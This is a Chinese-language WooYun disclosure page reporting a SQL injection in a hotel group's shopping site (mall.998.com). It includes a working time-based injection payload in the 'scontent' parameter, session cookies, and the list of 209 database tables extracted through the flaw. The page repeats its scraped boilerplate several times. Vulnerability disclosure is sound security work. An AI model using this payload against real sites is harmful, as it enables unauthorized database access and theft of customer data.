格林豪泰酒店管理集团某应用sql注入 | wooyun-2015-0126522| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126522

漏洞标题：格林豪泰酒店管理集团某应用sql注入

漏洞作者：路人甲

提交时间：2015-07-13 18:03

修复时间：2015-08-28 18:50

公开时间：2015-08-28 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-13：细节已通知厂商并且等待厂商处理中
2015-07-14：厂商已经确认，细节仅向厂商公开
2015-07-24：细节向核心白帽子及相关领域专家公开
2015-08-03：细节向普通白帽子公开
2015-08-13：细节向实习白帽子公开
2015-08-28：细节向公众公开

简要描述：

。。。。。。。。

详细说明：

漏洞网站：mall.998.com

GET /grouplist.html?scontent=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://mall.998.com:80/
Cookie: vary=staticdd7e8c7376ac351ea6932ff4d6d30932; s=16dfe4d3343f52e3c99c70de7134a436; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fmall.998.com%2F
Host: mall.998.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

存在漏洞的字段为scontent

Database: db_b2b2c
[209 tables]
+-----------------------------------------+
| sdb_aftersales_return_log               |
| sdb_aftersales_return_product           |
| sdb_associate_associate                 |
| sdb_b2c_brand                           |
| sdb_b2c_cart                            |
| sdb_b2c_cart_objects                    |
| sdb_b2c_comment_goods_point             |
| sdb_b2c_comment_goods_type              |
| sdb_b2c_counter                         |
| sdb_b2c_counter_attach                  |
| sdb_b2c_coupons                         |
| sdb_b2c_delivery                        |
| sdb_b2c_delivery_items                  |
| sdb_b2c_dly_h_area                      |
| sdb_b2c_dlycorp                         |
| sdb_b2c_dlytype                         |
| sdb_b2c_entity_goods                    |
| sdb_b2c_goods                           |
| sdb_b2c_goods_cat                       |
| sdb_b2c_goods_dly                       |
| sdb_b2c_goods_entity_items              |
| sdb_b2c_goods_keywords                  |
| sdb_b2c_goods_lv_price                  |
| sdb_b2c_goods_marketable_application    |
| sdb_b2c_goods_promotion_ref             |
| sdb_b2c_goods_rate                      |
| sdb_b2c_goods_spec_index                |
| sdb_b2c_goods_type                      |
| sdb_b2c_goods_type_props                |
| sdb_b2c_goods_type_props_value          |
| sdb_b2c_goods_type_spec                 |
| sdb_b2c_goods_view_history              |
| sdb_b2c_goods_virtual_cat               |
| sdb_b2c_member_addrs                    |
| sdb_b2c_member_advance                  |
| sdb_b2c_member_comments                 |
| sdb_b2c_member_coupon                   |
| sdb_b2c_member_email                    |
| sdb_b2c_member_goods                    |
| sdb_b2c_member_lv                       |
| sdb_b2c_member_msg                      |
| sdb_b2c_member_point                    |
| sdb_b2c_member_pwdlog                   |
| sdb_b2c_member_systmpl                  |
| sdb_b2c_members                         |
| sdb_b2c_message_log                     |
| sdb_b2c_order_coupon_user               |
| sdb_b2c_order_delivery                  |
| sdb_b2c_order_items                     |
| sdb_b2c_order_log                       |
| sdb_b2c_order_objects                   |
| sdb_b2c_order_pmt                       |
| sdb_b2c_orders                          |
| sdb_b2c_products                        |
| sdb_b2c_reship                          |
| sdb_b2c_reship_items                    |
| sdb_b2c_sales_rule_goods                |
| sdb_b2c_sales_rule_order                |
| sdb_b2c_sell_logs                       |
| sdb_b2c_shop                            |
| sdb_b2c_spec_values                     |
| sdb_b2c_specification                   |
| sdb_b2c_type_brand                      |
| sdb_base_app_content                    |
| sdb_base_apps                           |
| sdb_base_cache_expires                  |
| sdb_base_files                          |
| sdb_base_kvstore                        |
| sdb_base_network                        |
| sdb_base_queue                          |
| sdb_base_rpcnotify                      |
| sdb_base_rpcpoll                        |
| sdb_base_task                           |
| sdb_bdlink_link                         |
| sdb_bdlink_list                         |
| sdb_business_activity                   |
| sdb_business_brand                      |
| sdb_business_comment_orders_point       |
| sdb_business_comment_stores_point       |
| sdb_business_customer_service           |
| sdb_business_dlyaddress                 |
| sdb_business_dlycorp                    |
| sdb_business_earnest_log                |
| sdb_business_goods_cat                  |
| sdb_business_goods_cat_conn             |
| sdb_business_goods_import_tpl           |
| sdb_business_goods_promotion_price      |
| sdb_business_ipdata                     |
| sdb_business_member_stores              |
| sdb_business_partner                    |
| sdb_business_settlement                 |
| sdb_business_settlement_item            |
| sdb_business_store_log                  |
| sdb_business_store_view_history         |
| sdb_business_storecat                   |
| sdb_business_storegrade                 |
| sdb_business_storemanger                |
| sdb_business_storemember                |
| sdb_business_storeregion                |
| sdb_business_storeroles                 |
| sdb_business_storeviolation             |
| sdb_business_theme                      |
| sdb_business_themes                     |
| sdb_business_themes_file                |
| sdb_business_themes_tmpl                |
| sdb_business_violation                  |
| sdb_business_violationcat               |
| sdb_business_widgets                    |
| sdb_business_widgets_instance           |
| sdb_business_widgets_proinstance        |
| sdb_cellphone_activity                  |
| sdb_cellphone_activity_rel              |
| sdb_cellphone_banner                    |
| sdb_cellphone_busauction                |
| sdb_cellphone_category                  |
| sdb_cellphone_channel                   |
| sdb_cellphone_channeltype               |
| sdb_cellphone_clearance                 |
| sdb_cellphone_column                    |
| sdb_cellphone_columntype                |
| sdb_cellphone_feedback                  |
| sdb_cellphone_perauction                |
| sdb_cellphone_phone                     |
| sdb_cellphone_picad                     |
| sdb_cellphone_recgoods                  |
| sdb_cellphone_recstore                  |
| sdb_cellphone_tag                       |
| sdb_cellphone_tag_rel                   |
| sdb_complain_complain                   |
| sdb_complain_complain_comments          |
| sdb_complain_reports                    |
| sdb_complain_reports_cat                |
| sdb_complain_reports_comments           |
| sdb_content_article_bodys               |
| sdb_content_article_indexs              |
| sdb_content_article_nodes               |
| sdb_couponlog_order_coupon_ref          |
| sdb_couponlog_order_coupon_user         |
| sdb_dbeav_meta_register                 |
| sdb_dbeav_meta_value_datetime           |
| sdb_dbeav_meta_value_decimal            |
| sdb_dbeav_meta_value_int                |
| sdb_dbeav_meta_value_longtext           |
| sdb_dbeav_meta_value_text               |
| sdb_dbeav_meta_value_varchar            |
| sdb_dbeav_recycle                       |
| sdb_desktop_filter                      |
| sdb_desktop_flow                        |
| sdb_desktop_hasrole                     |
| sdb_desktop_menus                       |
| sdb_desktop_recycle                     |
| sdb_desktop_role_flow                   |
| sdb_desktop_roles                       |
| sdb_desktop_tag                         |
| sdb_desktop_tag_rel                     |
| sdb_desktop_user_flow                   |
| sdb_desktop_users                       |
| sdb_ectools_analysis                    |
| sdb_ectools_analysis_logs               |
| sdb_ectools_currency                    |
| sdb_ectools_order_bills                 |
| sdb_ectools_payments                    |
| sdb_ectools_refunds                     |
| sdb_ectools_regions                     |
| sdb_groupbuy_activity                   |
| sdb_groupbuy_groupapply                 |
| sdb_groupbuy_memberbuy                  |
| sdb_image_image                         |
| sdb_image_image_attach                  |
| sdb_logisticstrack_logistic_log         |
| sdb_mobile_cart                         |
| sdb_mobile_cart_objects                 |
| sdb_mobile_members                      |
| sdb_openid_openid                       |
| sdb_operatorlog_logs                    |
| sdb_operatorlogmanage_logs              |
| sdb_operatorlogmanage_register          |
| sdb_package_activity                    |
| sdb_package_attendactivity              |
| sdb_package_sell_log                    |
| sdb_pam_account                         |
| sdb_pam_auth                            |
| sdb_pam_log                             |
| sdb_pointprofessional_member_point_task |
| sdb_scorebuy_activity                   |
| sdb_scorebuy_memberLvScore              |
| sdb_scorebuy_memberbuy                  |
| sdb_search_search                       |
| sdb_site_city                           |
| sdb_site_explorers                      |
| sdb_site_link                           |
| sdb_site_menus                          |
| sdb_site_modules                        |
| sdb_site_route_statics                  |
| sdb_site_seo                            |
| sdb_site_themes                         |
| sdb_site_themes_file                    |
| sdb_site_themes_tmpl                    |
| sdb_site_widgets                        |
| sdb_site_widgets_instance               |
| sdb_site_widgets_proinstance            |
| sdb_sphinx_goods_order                  |
| sdb_sphinx_last                         |
| sdb_spike_activity                      |
| sdb_spike_memberbuy                     |
| sdb_spike_spikeapply                    |
| sdb_timedbuy_activity                   |
| sdb_timedbuy_businessactivity           |
| sdb_timedbuy_memberbuy                  |
+-----------------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-07-14 18:48

厂商回复：

感谢对格林的关注，已通知相关人员进行处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126522

漏洞标题：格林豪泰酒店管理集团某应用sql注入

相关厂商：格林豪泰酒店管理集团

漏洞作者：路人甲

提交时间：2015-07-13 18:03

修复时间：2015-08-28 18:50

公开时间：2015-08-28 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126522

漏洞标题：格林豪泰酒店管理集团某应用sql注入

相关厂商：格林豪泰酒店管理集团

漏洞作者： 路人甲

提交时间：2015-07-13 18:03

修复时间：2015-08-28 18:50

公开时间：2015-08-28 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126522"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云